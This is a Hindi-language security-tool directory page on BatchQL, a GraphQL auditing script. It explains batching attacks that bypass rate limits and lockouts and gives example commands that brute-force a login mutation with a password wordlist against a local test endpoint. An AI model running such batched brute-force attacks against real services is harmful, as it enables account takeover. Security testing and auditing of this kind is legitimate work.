Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
batchql — ग्राफ़क्यूएल सुरक्षा ऑडिटिंग स्क्रिप्ट जो बैच ग्राफ़क्यूएल क्वेरी और म्यूटेशन निष्पादित करने पर केंद्रित है। | Kitploit
उपकरण/GitHubGitHub/assetnote/batchql
भेद्यता स्कैनरएपीआई सुरक्षा परीक्षणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubassetnote/batchql

batchql

ग्राफ़क्यूएल सुरक्षा ऑडिटिंग स्क्रिप्ट जो बैच ग्राफ़क्यूएल क्वेरी और म्यूटेशन निष्पादित करने पर केंद्रित है।

रिपॉजिटरी देखें
413424 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

BatchQL

BatchQL एक GraphQL सुरक्षा ऑडिटिंग स्क्रिप्ट है जिसका ध्यान बैच GraphQL क्वेरी और म्यूटेशन करने पर है। यह स्क्रिप्ट जटिल नहीं है, और हम सुधारों का स्वागत करते हैं।

जब हम GraphQL बैचिंग हमलों की समस्या के क्षेत्र का पता लगा रहे थे, तो हमने पाया कि इंटरनेट पर कुछ ब्लॉग पोस्ट थे, हालांकि GraphQL बैचिंग हमले करने के लिए कोई उपकरण नहीं था।

GraphQL बैचिंग हमले कार्यान्वित कार्यक्षमताओं के आधार पर काफी गंभीर हो सकते हैं। उदाहरण के लिए, एक पासवर्ड रीसेट कार्यक्षमता की कल्पना करें जो आपके ईमेल पर भेजे गए 4 अंकों के पिन की अपेक्षा करती है। इस उपकरण के साथ, आप एक ही GraphQL क्वेरी में सभी 10 हजार पिन प्रयास कर सकते हैं। यह पासवर्ड रीसेट प्रवाह के कार्यान्वयन विवरणों के आधार पर किसी भी दर सीमा या खाता लॉकआउट को बायपास कर सकता है।

पहचान

यह उपकरण निम्नलिखित का पता लगाने में सक्षम है:

  • इंट्रोस्पेक्शन क्वेरी समर्थन
  • स्कीमा सुझाव पहचान
  • संभावित CSRF पहचान
  • क्वेरी नाम आधारित बैचिंग
  • क्वेरी JSON सूची आधारित बैचिंग

हमले

वर्तमान में, यह उपकरण बैचिंग हमलों के लिए केवल JSON सूची आधारित क्वेरी भेजने का समर्थन करता है। यह उन परिदृश्यों का समर्थन करता है जहाँ चर क्वेरी में एम्बेडेड हैं, या जहाँ वे JSON इनपुट में प्रदान किए गए हैं।

उपयोग

गणना

root@kitploit:~
❯ python batch.py -e http://re.local:5000/graphiql -p localhost:8080

Schema suggestions enabled. Use Clairvoyance to recover schema: https://github.com/nikitastupin/clairvoyance
CSRF GET based successful. Please confirm that this is a valid issue.
CSRF POST based successful. Please confirm that this is a valid issue.
Query name based batching: GraphQL batching is possible... preflight request was successful.
Query JSON list based batching: GraphQL batching is possible... preflight request was successful.
Most provide query, wordlist, and size to perform batching attack.

बैचिंग हमले

  1. एक फ़ाइल सहेजें जिसमें आपकी GraphQL क्वेरी हो, अर्थात acc-login.txt:
root@kitploit:~
mutation emailLoginRemembered($loginInput: InputRememberedEmailLogin!) {
  emailLoginRemembered(loginInput: $loginInput) {
    authToken {
      accessToken
      __typename
    }
    userSessionResponse {
      userToken
      userIdentity {
        userId
        identityType
        verified
        onboardingStatus
        registrationReferralCode
        userReferralInfo {
          referralCode {
            code
            valid
            __typename
          }
          __typename
        }
        __typename
      }
      __typename
    }
    __typename
  }
  }
  1. GraphQL बैचिंग हमला चलाने के लिए निम्नलिखित कमांड चलाएँ:
root@kitploit:~
❯ python batch.py --query acc-login.txt --wordlist passwords.txt -v '{"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}' --size 100 -e http://re.local:5000/graphiql -p localhost:8080

उपरोक्त कमांड निम्नलिखित करता है:

  • एक स्थानीय फ़ाइल --query acc-login.txt से क्वेरी निर्दिष्ट करता है।
  • एक वर्डलिस्ट --wordlist passwords.txt निर्दिष्ट करता है।
  • प्रतिस्थापन पहचानकर्ता के साथ चर इनपुट -v {"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}} निर्दिष्ट करता है।
  • बैच आकार --size 100 निर्दिष्ट करता है।
  • एंडपॉइंट -e http://re.local:5000/graphiql निर्दिष्ट करता है।
  • प्रॉक्सी -p localhost:8080 निर्दिष्ट करता है।

संदर्भ

  • GraphQL का शोषण
  • डैम वल्नरेबल GraphQL एप्लिकेशन
  • GraphQL बैचिंग हमला - Wallarm
  • बैचिंग हमलों को कम करना
टूल डाउनलोड करें